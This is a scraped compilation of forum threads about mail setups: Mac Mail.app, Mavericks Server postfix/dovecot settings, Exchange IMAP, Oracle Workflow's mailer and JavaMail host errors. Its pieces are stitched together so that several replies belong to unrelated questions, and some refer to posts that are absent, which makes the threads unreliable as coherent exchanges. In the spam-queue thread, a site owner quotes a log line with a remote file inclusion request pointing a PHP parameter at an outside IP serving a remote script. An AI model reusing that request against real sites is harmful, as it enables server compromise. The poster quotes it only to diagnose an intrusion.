  • Config of Mail.app, SSL, etc.

    Hi folks. I have a tight deadline on this one.
    My laptop won't reach into my mail server.
    Mail server works, etc.
    How do i configure an outgoing mail account using an ssl on a new port? I use port 3333 as public ports often block < 2000 so I went above. My router sends 3333 into the SMTP port on my Leopard Server, which has a mail server running.
    Now, in the places where I go, Bell Canada has no clue how to do DNS lookup, and messes it up. So I want to plug my fixed IP number in there. It still won't work.
    - SSL and MD5 Challenge
    - fixed IP
    Love to hear any ideas I can try.
    Cheers

    Fixed. It wasn't anything other than the ISP called Bell Canada. Their DNS lookup is bad.

  • Mail.app stopped working over IMAP to exchange 2003 server

    Hi Peoples,
    I'm posting this as a problem with the solution simply because of the absolute bizarre behavior that I observed....
    PROBLEM
    On Thursday night, without me having made any changes to either my mac or my exchange server, mail.app just stopped working. The problem was like many I've read about on various forums including this one but none of the solutions worked. Basically the problem was that the server would no longer authenticate mail.app's connection attempts. It failed both plain text and SSL with both NTLM and password style authentication. IMAP from a PC was still working OK (I keep this around for testing). So I tried the following...
    Removed all the relevant keychain entries - no go
    Removed the entire login keychain - no go
    Removed & reconfigured the exchange account config from mail.app - no go
    Removed the entire config from mail.app (i.e. removed ~/Library/Preferences/com.apple.mail.plist ) - bop-bong still no go
    created a new IMAP service in exchange in case something was screwed there - no go
    created a new user in exchange and tried that user - still no go
    sledge hammer approach - reinstalled OS X - no go
    48+ hours later... Getting very frustrated by now... scratching head...
    SOLUTION
    OK (should have done this much earlier and saved much pain), time to install another IMAP client on the mac and see what happens.... installed Thunderbird and low and behold it worked first go with and without SSL - hmmm
    Restarted mail.app and reconfigured to use same settings as thunderbird (SSL with password authentication - no NTLM)
    What the????? Now it all works again....
    I cannot for the life of me figure out why this happened, and why only mail.app was affected. Obviously, something went screwy on the Exchange server and caused mail.app to have a coronary. Whatever it was, other IMAP clients seemed to be able to handle it. Was it the install and subsequent use of thunderbird that fixed it - I hope not but who knows...
    Think I'll be keep thunderbird installed in case it happens again... very, very, very strange.
    Anyways... hope this helps if anyone else experiences such unexplainable weirdness.
    Cheers - I'm going to have Chardy on the balcony and think about something else.

    Just thought I'd update with the latest... This problem happened again this morning and again, the only way to fix it was to connect from the mac with another IMAP client (I used Thunderbird again) and immediately the problem was fixed.
    Need to do some detailed network analysis here to see exactly what's going on but it's definitely a case of mail.app not playing nicely with Exchange (or vice versa).
    Cheers, time for a JD

  • Mail Server suddenly stopped working

    My mail server has stopped working, and I can't figure out why. This is a brand new MacMini with the latest Maverics Server (preinstalled) that I just setup last month. (We migrated from an Xserve running 10.6.) Up to this point, mail has worked flawlessly.
    This afternoon I used the Server app to create a new user. I then went about setting them up for ssh access and installing a public/private keypair (this is for a git repository). Around the same time, my mail server simply stopped working. As far as I know, no other configuration changes were made.
    When I go into the Mail service in the Server app the status perpetually says "Starting...". The 'postfix status' command says that postfix is not running. I've checked every log and error file, and I can only find three anomolies:
    The SMTP log file reports:
    Feb 11 01:31:06 mail.gloaming.com postfix/postmap[7152]: warning: /Library/Server/Mail/Data/scanner/amavis/local_domains.db: duplicate entry: "mail.gloaming.com"
    This warning has been logged before, several weeks earlier, so I assume it's not a serious problem.
    The other warning is:
    Feb 11 00:10:49 mail.gloaming.com postfix/postfix-script[23141]: warning: not owned by _postfix: /Library/Server/Mail/Data/mta/./guid_device_maps.plist
    Other threads seem to indicate that this warning is benign.
    The only other problem that looks really suspicious (to me) is in the system.log:
    Feb 11 01:22:52 mail.gloaming.com ocspd[4947]: ERROR: unable to get the receiver data from the DB!
    I'm not sure what that means, but it doesn't sound good.
    Some threads point a finger at the virus and junk mail scanners. If I disable all mail filtering, the mail server status will finally change to "Serving mail at mail.gloaming.com". But it isn't. All attempts to get mail from the server are refused.
    (Oh, and I've restarted the server several times.)
    The postconf command tells me that the postfix system isn't accepting outside connections:
    inet_interfaces = loopback-only
    So it would appear that Server is setting this. Any attempt to change it back to "= all" fails, as the server software overwrites it with "= loopback-only" at its first possible opportunity. (Editing the main.cf file and reloading postfix doesn't fix it either.)
    Here's the really strange part. The server just started do this today. I recovered a backup of the main.cf file from yesterday and diffed it with the one that's not working:
    mail:postfix root# diff /Library/Server/Mail/Config/postfix/main.cf /Users/admin/Desktop/main.cf
    675c675
    < inet_interfaces = loopback-only
    > inet_interfaces = all
    682c682
    < smtpd_helo_restrictions = reject_non_fqdn_helo_hostname reject_invalid_helo_hostname
    > smtpd_helo_restrictions = reject_invalid_helo_hostname reject_non_fqdn_helo_hostname
    692c692
    < mydestination = $myhostname, localhost.$mydomain, localhost, mail.gloaming.com
    > mydestination = $myhostname, localhost.$mydomain, localhost, mail.gloaming.com, $mydomain
    712d711
    < postscreen_dnsbl_sites = zen.spamhaus.org*2
    As you can see, the Server software has deliberatly started setting inet_interfaces to loopback-only and I can't figure out how to get it to set it back to "all".
    Some of the other threads have suggested "wipe and reinstall", but I've spent three weeks setting up this sever and shipping it to a co-location facility—starting over really isn't an option.
    I'd really just want to know why the Server software is suddently configuring the mail server so it won't receive any mail!

    The mystery continues.
    This morning, I decided to take a fresh look at what's going on by recovering a backup copy of my entire /Library/Server/Mail/Config directory from last month. Looking at the item capture list, it shows that none of the files in my Mail/Config directory have changed since late last month.
    Here are the disturbing changes.
    In Server/Mail/Config/dovecot/dovecot.conf, there is one different line.
    working:
         protocols = imap pop3 lmtp sieve
    now:
         protocols = lmtp sieve
    So clearly, the server doesn't think we should be running IMAP or POP. Which is probably the root of the problem.
    In Server/Mail/Config/postfix/mail.cf, there are a number of minor/cosmetic differences, but the problematic ones appear to be
    working:
         inet_interfaces = all
         mydestination = $myhostname, localhost.$mydomain, localhost, mail.gloaming.com, $mydomain
    now:
         inet_interfaces = loopback-only
         mydestination = $myhostname, localhost.$mydomain, localhost, mail.gloaming.com
    Again, this configuration would imply that there are no public mail services.
    Some other odd change occured in the Server/Mail/Config/postfix/main.cf file
    working:
         smtpd     pass  -       -       n       -       -       smtpd
         pickup    fifo  n       -       n       60      1       pickup
              -o content_filter=smtp-amavis:[127.0.0.1]:10024
    now:
         smtpd     pass  -       -       n       -       -       smtpd
              -o receive_override_options=no_address_mappings
         pickup    fifo  n       -       n       60      1       pickup
              -o content_filter=
    Reading through some other posts, I also found another inexplicable change reported by other users having similar problems. The /System/Library/LaunchDaemons/org.postfix.master.plist suddenly changed.
    working:
        <key>OnDemand</key>
        <false/>
        <key>ProgramArguments</key>
        <array>
            <string>master</string>
            <string>-c</string>
            <string>/Library/Server/Mail/Config/postfix</string>
        </array>
    now:
        <key>OnDemand</key>
        <true/>
        <key>ProgramArguments</key>
        <array>
            <string>master</string>
            <string>-c</string>
            <string>/Library/Server/Mail/Config/postfix</string>
            <string>-e</string>
            <string>60</string>
        </array>
    The postfix service is now "OnDemand" with a new, and myserious, "-e 60" option added. (I can find no documentation for an -e option in the postfix control tool.)
    Ultimately, I "fixed" the problem by restoring the backup copy of my entire /Library/Server/Mail/Config folder, the /System/Library/LaunchDaemon/org.postfix.master.plist file, and immedately restarting the server. The mail servers started and everything appears to be normal.
    But this whole experience has made me very learly of the Server app. Why did these configuration changes occur? What settings or circumstances caused them to spontaniously change to an, essentually, unusable state? I'm now afriad of making any changes via Server.app for fear it will decide I shouldn't have a working mail server again.
    If anyone has any insights, I'd ver very interested in hearing them.

    Hi Frenz,
    i`m fresher to OBIEE, i need the step for "Send a OBIEE report to non OBIEE user (Client) Mail in OBIEE11g". searched in on-line got only OBIEE 10g Documents that one also followed but no result.Please help Me....the Step to config a Mail for external user.
    Thnaks,

    Have the SMTP server configured by your admin and create agent privilege given to your role. Then Schedule an Agents to yourself/Testuser with the report to be sent to external user as its Content. Set up the Delivery Profile of the recipient. In the set up for email device - delivery profile specify the external email address. This might be useful

  • Mail Queue Filling Up - Spam?

    Hi All,
    Over the weekend the mail queue in SA filled up. This morning some users where complaining about outgoing messages not being delivered. When I checked the mail queue it had about 500 messages in it. All of them looked liked spam. When I deleted them, outgoing messages started being delivered.
    I have no idea why that would happen. Could it mean a hacked machine on the network? I've turned off all of my window's machines overnight to see what happens.

    Thanks Jeff. I think the code injection maybe it. I have the server set to relay all outgoing messages to our ISP's mail server. When I look at the messages in the mail queue, all of them seem to be bounce backs from the ISP (domain name does not exist.)

    The line "//components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -" seem to be that code injection. We don't have a file named sitemap.xml.php on our website.
    Am I correct that this is a code injection?
    I have three site running on this server. One is a plain old static site for the company it does not use PHP. One is webmail that came with OS X. The final one is an file storage site that does use PHP. It's a commercial code called Copper Project. I've turned off the site overnight to see if this still happens.
    The link in in Jeff's post seems to suggest a simple fix. However, I know nothing about PHP programing, so this is beyond me.
    Thanks

  • SMTP settings populating Mail.app

    Hi All,
    I've set up SLS Mail to serve up incoming email via IMAP and relay outgoing email through my ISP's SMTP server. The configuration is nicely replicated to the client and Mail App on the client machine picks this up. Now, the IMAP port is forwarded and so is accessible outside the firewall, however, I don't want to forward SMTP and would rather the clients use a different SMTP altogether. I can't find anywhere to set up the configuration for a different SMTP server in Server Admin and from my Googling I figure this needs to be done by modifying a plist file somewhere in SLS and/or using MCX properties. I cannot set up the config in Mail App as this constantly gets overwritten by what is coming from the server. Can anyone point me to where I can modify these settings in SLS so that I clients can use an SMTP server at a different address from the POP/IMAP server? Apple's documentation is not helpful at all in this area.
    Some help would be greatly appreciated.

    Oops, I meant I can only "send" mail via Thunderbird, not "recieve".

  • Workflow Java Mailer - Where is it?

    Hi,
    I have installed Oracle Workflow Server Release 10.1.0.3 for Linux x86 standalone on a on a 10.1.0.4 database run the configuration assistant. The DAD is configured in the 10G Standalone HTTPD which i installed from the 10.1.0.3 companion CD and after sorting out a number of installation issues the installation was successful.
    I have one missing component and that is the Java Mailer which is said to be 'included' with Workflow server 2.6.3 in the install notes:
    Oracle® Workflow Installation Notes for Oracle Database Release 2.6.3 February 2004 Part No. B12169-01
    Quote "Java-based Workflow Notification Mailer: The Notification System includes a Java-based program called a notification mailer, implemented as a service component within the Generic Service Component Framework, which communicates notifications to users via e-mail and interprets responses. Oracle Workflow provides one seeded notification mailer service component called the Workflow Notification Mailer. This program requires an outbound SMTP mail server and an inbound IMAP mail server"
    after chasing my tail for hours trying to find where and how this components needs to be installed I came across 266612.1 which has some references to a. Oracle® Content Management SDK 10g (9.0.4.2.0) and Oracle® Application Server Integration 10g (10.1.2.0.0).
    I have looked at the documentation for these two components and there is nothing specific mentioned about the Java Mailer, although workflow is mentioned amoung other things..
    If someone could point me in the right direction i would be exceedingly grateful. What I thought was a simple exercise in getting workflow installed and being able to send emails using the standard workflow API's and turned into a monumental journey of frustration and utter waste of time which a customer is paying for.
    Reading between the lines it looks like i need yet another installation of Oracle (the 10.1.2) application server along with the two components above.
    Also, Workflow 2.6.4 is included in the 10G Release 2 Database companion CD. Is the Java Mailer included with this version?
    My apologies if this post has come across somewhat indignant, I get annoyed when people flame in posts and then ask for help, but i am genuinely needing advice from someone who done the seemingly impossible.
    regards,
    Brenden

    Sorry, for database installation there is a seperate application to manage workflow (can't remember the name but you can find it in the apache server middle tier or you can view "install" folder a WF***MANAGER.ear file in there, start up your apache and run it in your browser ).
    The parameter you entered in config assistant for mailer isn't enough to get it working because you need some extra bits, for example the password and the path that points to processed folder and discard folder, etc. All of these bit can be set in workflow manager, remember don't keep looking for the JAR file for mailer, even if you found it you can do nothing about it unless you successfully run the workflow manager after installation.
    Once you have the workflow manager up and running you shall be able to config the mailer in there.
    List of steps: (if you go for silent installation you don 't need to do the post config in workflow manager anymore, and mailer shall be ready to run)
    for wf shipped with DB
    1. follow offical installation note
    2. it will ask for a apache home to be used as middle tier
    3. run through all steps
    4. find Wf manager and run the config through the interface.
    5. test the mailer in wf manager
    I would like someone correct if wrong because I have no experience to set up wf server shipped with DB, but for the one shipped with CMSDK I can answer you alot.
    Regards,
    Kun

    Hi,
              This a JMS forum, not a mail forum.
              They are very different animals.
              Try posting to "general", or perhaps "jndi".

  • Colored messages in Mail

    I was playing around with the settings in Mail and I've tested the Rule config in Mail and created a color mail from 'Joe' in Red and 'Alan' in Green
    This works.
    I then removed those rules, but after restarting Mail, the messages are STILL colored in those colors!
    I then tried to create a new rule in the hope of overwriting the old ones: color mail from 'Joe' in Blue
    This seems to confuse mail as the messages from 'Joe' are still in red!
    Its annoying when the entire screen is in red (when you filter the messages under From)
    I've tried to back up the mail and import it to another user, but this results in the same colors being kept (akes sense as its a copy)
    I just want it to go back to the usual no-colors
    Can anyone Help!
    I'm using Mail v 2.1
    Thanks
      Mac OS X (10.4.7)

    Messages don't appear in a particular color because there is a rule that says so. They appear in a particular color because that attribute of the message was changed at some point. The message color doesn't go away when removing the rule that changed it, just like destroying a brush doesn't change the color of anything that was painted with it.
    Rules aren't settings that are continuously evaluated for every message. They are automatically evaluated only once for each incoming message when it arrives, and can be manually applied to any message every time you wish.
    You can remove the color of those messages by manually applying to them a rule that changes the color again (i.e. by "painting" them again):
    1. Go to Preferences > Rules, and setup a rule as follows:
    If [any] of the following conditions are met:
    [Every Message]
    Perform the following actions:
    [Set Color] [of text] [Black]
    If what you want to remove is the background color instead, the action of the rule should be:
    [Set Color] [of background] [White]
    2. When done, Mail will ask you whether you want to apply the rules (all the active rules, including the junk filter) to all the messages currently being displayed. Click Yes only if you really want to do that. Otherwise, click No.
    3. Select the messages you want to remove the color from. Note the number of messages currently in the mailbox.
    4. Do Message > Apply Rules.
    5. Check that no message has disappeared as a result. If the number of messages in the mailbox is less than it was before applying the rules, that means one of the other rules (maybe the junk filter) has moved some of those messages somewhere.
    6. Either get rid of the rule or just uncheck the Active checkbox next to it in the rules list when done. There is no point in keeping that rule active if you no longer need it.

  • Sending Confirm mail

    hi,

              catch (Exception e)
                   out.println("Invalid e-mail address.<br>" + e.getMessage());
    when i use this i am getting an error as
    Invalid e-mail address.
    Sending failed; nested exception is: javax.mail.MessagingException: Unknown SMTP host: smtp.rediffmail.com; nested exception is: java.net.UnknownHostException: smtp.rediffmail.com
    Please help

    Hi,
    This is quite simple, probably there is no server called smtp.rediffmail.com. Use 'nslookup' to find out the ip of @rediffmail.com. One more thing , if you try to use rediff servers to send mails to non-rediff ids, it will be considered as a spam. In practice you cannot do that, rediff will reject your request.
    cheers

  • Mac Mail can only open single email

    Hi there - new to Mac. Using MacBook Pro, 10.9.4
    Without (knowingly) modifying configs, Mac Mail now only allows me to display a single email at a time. The very top of the email also no longer contains the menu bar with buttons to expand, minimize, close (below).
    When I open an email or select compose, the email enters the screen from the bottom.
    Below is a shot of what an email looks like. Tx !

    Hello gratefulcreative,
    Welcome to the Apple Support Communities!
    I understand the different issues you are seeing in Mail and thank you for including a screenshot. From the picture, it appears that Mail is in full-screen view. To change back to the non full screen view that will include the menu bar with buttons as you described in your post, please follow the instructions in the attached article.
